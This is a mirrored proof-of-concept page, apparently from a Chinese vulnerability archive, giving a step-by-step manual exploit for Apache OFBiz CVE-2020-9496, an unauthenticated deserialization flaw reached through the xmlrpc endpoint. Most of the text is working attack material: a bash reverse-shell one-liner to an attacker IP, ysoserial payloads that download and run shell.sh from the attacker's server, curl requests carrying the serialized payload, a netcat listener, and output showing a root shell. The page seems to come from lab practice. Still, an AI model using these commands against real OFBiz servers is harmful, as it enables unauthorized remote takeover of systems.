关联漏洞
标题:Apache OFBiz 代码问题漏洞 (CVE-2020-9496)Description:Apache OFBiz是美国阿帕奇(Apache)基金会的一套企业资源计划(ERP)系统。该系统提供了一整套基于Java的Web应用程序组件和工具。 Apache OFBiz 17.12.03版本中存在代码问题漏洞。该漏洞源于WEB应用缺少对客户端数据的正确验证。攻击者可利用该漏洞执行客户端代码。
Description
CVE-2020-9496 manual exploit
介绍
# CVE-2020-9496 - RCE
Because the 2 xmlrpc related requets in webtools (xmlrpc and ping) are not using authentication they are vulnerable to unsafe deserialization. This issue was reported to the security team by Alvaro Munoz <pwntester@github.com> from the GitHub Security Lab team.
This vulnerability exists due to Java serialization issues when processing requests sent to /webtools/control/xmlrpc. A remote unauthenticated attacker can exploit this vulnerability by sending a crafted request. Successful exploitation would result in arbitrary code execution.
# Affected Version 17.12.01
# Fixed Versions 18.12.01, 17.12.04
Original Blog: https://securitylab.github.com/advisories/GHSL-2020-069-apache_ofbiz/
For this POC to work we need to drop a shell script and execute/access that file via curl.
### STEP 1: Create A Shell File With Bash One-liner With Your IP Address & Port Address.
```
$ cat shell.sh
#!/bin/bash
/bin/bash -i >& /dev/tcp/10.10.x.x/1337 0>&1
```
### STEP 2: Now We Need To Make This File Available via HTTP Service
```
$ sudo python3 -m http.server 80
```
### STEP 3: Generate Payload via ysoserial - Change IP
```
$ ysoserial CommonsBeanutils1 "wget 10.10.x.x/shell.sh -O /tmp/shell.sh" | base64 | tr -d "\n"
```
### STEP 4: Copy The Output of Your Payload - Very Long String
```
rO0ABXNyABdqYXZhLnV0..........................................................AAAACABQAEQAAAAoAAQACABYAEAAJcHQABFB3bnJwdwEAeHEAfgANeA==
```
### STEP 5: Use the below curl command to execute our payload. Paste payload after extensions”>
```
$ curl https://127.0.0.1:8443/webtools/control/xmlrpc -X POST -v -d '<?xml version="1.0"?><methodCall><methodName>ProjectDiscovery</methodName><params><param><value><struct><member><name>test</name><value><serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">rO0ABXNyABdqYXZhLnV0..........................................................AAAACABQAEQAAAAoAAQACABYAEAAJcHQABFB3bnJwdwEAeHEAfgANeA==</serializable></value></member></struct></value></param></params></methodCall>' -k -H 'Content-Type:application/xml'
```
### Curl Command Without Payload For Your Reference
```
$ curl https://127.0.0.1:8443/webtools/control/xmlrpc -X POST -v -d '<?xml version="1.0"?><methodCall><methodName>ProjectDiscovery</methodName><params><param><value><struct><member><name>test</name><value><serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions"></serializable></value></member></struct></value></param></params></methodCall>' -k -H 'Content-Type:application/xml'
```
### Make Sure Whether You Got A Hit On HTTP Server After Curl Command Execution
```
$ sudo python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.129.x.x - - [29/Apr/2021 12:57:07] "GET /shell.sh HTTP/1.1" 200 -
```
As you can see we got a hit on our HTTP server. File has been downloaded to /tmp directory named as shell.sh. Now to execute that file create payload again. But before you do that start a netcat listener.
### STEP 6: Start NetCat Listener
```
$ nc -lvnp 1337
listening on [any] 1337 ...
```
### STEP 7: Create Payload To Execute Previously Downloaded Shell Script
```
$ ysoserial CommonsBeanutils1 "bash /tmp/shell.sh" | base64 | tr -d "\n"
```
### STEP 8: Copy & Paste The Output Inside Curl Command & Execute It
```
curl https://127.0.0.1:8443/webtools/control/xmlrpc -X POST -v -d '<?xml version="1.0"?><methodCall><methodName>ProjectDiscovery</methodName><params><param><value><struct><member><name>test</name><value><serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">rO0ABXNyABdqYXZhLnV0..........................................................AAAACABQAEQAAAAoAAQACABYAEAAJcHQABFB3bnJwdwEAeHEAfgANeA==</serializable></value></member></struct></value></param></params></methodCall>' -k -H 'Content-Type:application/xml'
```
### STEP 10: Check NetCat Listener For Reverse Connection
```
$ nc -lvnp 1337
listening on [any] 1337 ...
connect to [10.10.x.x] from (UNKNOWN) [10.129.x.x] 60006
bash: cannot set terminal process group (30): Inappropriate ioctl for device
bash: no job control in this shell
root@test:/usr/src/apache-ofbiz-17.12.01# id
id
uid=0(root) gid=0(root) groups=0(root)
```
文件快照
[4.0K] /data/pocs/7b7246682bc76e6b6d8c92e86f1ed29af97e15e8
└── [4.1K] README.md
0 directories, 1 file
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮件到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对 POC 代码进行快照,为了长期维护,请考虑为本地 POC 付费/捐赠,感谢您的支持。